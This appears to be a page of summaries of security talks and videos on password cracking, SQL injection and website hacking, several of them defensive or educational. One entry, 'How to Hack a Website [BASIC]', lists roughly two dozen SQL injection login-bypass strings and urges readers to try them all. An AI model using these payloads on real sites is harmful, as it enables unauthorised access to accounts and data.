Cracking 400,000 Passwords

Cracking 400,000 Passwords

Speakers:
Matt Weir PhD Student, Florida State University
Professor Sudhir Aggarwal Florida State University

Remember when phpbb.com was hacked in January and over 300,000 usernames and passwords were disclosed? Don't worry though, the hacker only tried to crack a third of them, (dealing with big password lists is a pain), and of those he/she only broke 24%. Of course the cracked password weren't very surprising. Yes, we already know people use "password123". What's interesting though is figuring out what the other 76% of the users were doing. In this talk I'll discuss some of my experiences cracking passwords, from dealing with large password lists, (89% of the phpbb.com list cracked so far), salted lists, (Web Hosting Talk), and individual passwords, (TrueCrypt is a pain). I'll also be releasing the tools and scripts I've developed along the way.

Read more »

How to hack millions of routers

How to hack millions of routers

Read more »

Advanced SQL Injection

Advanced SQL Injection

Speaker: Joseph McCray Founder of Learn Security Online

SQL Injection is a vulnerability that is often missed by web application security scanners, and it's a vulnerability that is often rated as NOT exploitable by security testers when it actually can be exploited.

Advanced SQL Injection is a presentation geared toward showing security professionals advanced exploitation techniques for situations when you must prove to the customer the extent of compromise that is possible.

The key areas are:

•IDS Evasion, Web Application Firewall Bypass
•Privilege Escalation
•Re-Enabling stored procedures
•Obtaining an interactive command-shell
•Data Exfiltration via DNS

Read more »

PHP Security: SQL Injection

PHP Security: SQL Injection

In this video I talk not so briefly about SQL injection starting with what it is and then moving on to how to prevent is causing problems for your site.

Read more »

How to Hack a Website [BASIC]

How to Hack a Website [BASIC]



How to Hack a website [BASIC]
you dont need to download any software.

here are the strings you can use:

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

this might take a while to try all of them, but, what the heq, its worth it.

Read more »

Remote Shutdown

Remote Shutdown

Read more »

How to Hack a Web Site

How to Hack a Web Site


In this first lecture of the Fall 2010 series, Dr. Loveland and her special guest Eve Hacker take you on a precautionary journey regarding computer security, with a talk entitled "How to Hack a Web Site". Adams State Computer Science Program: http://www.adams.edu/academics/compsci/index.php

Read more »